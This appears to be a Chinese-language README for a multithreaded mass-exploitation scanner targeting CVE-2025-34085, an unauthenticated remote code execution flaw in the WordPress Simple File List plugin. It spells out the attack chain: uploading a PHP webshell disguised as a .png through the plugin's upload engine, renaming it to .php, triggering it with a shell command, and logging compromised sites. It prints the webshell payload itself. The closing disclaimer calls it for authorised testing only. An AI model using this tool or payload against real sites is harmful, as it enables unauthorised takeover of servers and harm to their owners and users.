一个多目标未授权RCE扫描器,针对影响WordPress Simple File List插件的CVE-2025-34085。可在大型目标集上执行文件上传、重命名并触发PHP webshell。
CVE-2025-34085 的大规模利用扫描器 —— 针对 WordPress Simple File List 插件的未认证远程代码执行漏洞。
该工具上传一个伪装成图片的 PHP 载荷,通过易受攻击的文件引擎重命名,并用自定义命令触发 shell 执行。支持多线程扫描大规模目标集。
targets.txt 读取)vuln.txtpython3 CVE-2025-34085.py
目标应列在 targets.txt 中:
example.com
http://target2.com
https://target3.com
根据需要编辑脚本中的以下值:
COMMAND = "id" # 要执行的 Shell 命令
EXPECTED_SUBSTRING = "uid=" # 用于验证命令执行成功的字符串
THREADS = 20 # 并发线程数
通过易受攻击的 ee-upload-engine.php 上传一个包含 <?php system($_GET['cmd']); ?> 的假 .png 文件。
使用 ee-file-engine.php 将其重命名为 .php、.phtml 等。
发送 GET 请求触发 shell,附带 cmd=id。
根据预期的输出子字符串验证成功。
成功命中结果保存到:
vuln.txt
每行包含易受攻击的 URL、shell 路径和命令输出。
WordPress Simple File List 插件(受 CVE-2025-34085 影响的未修补版本)
具有可写 wp-content/uploads/ 的 Apache/Nginx 默认配置
此工具仅用于教育和授权测试。 使用风险自负。未经授权访问系统是违法的。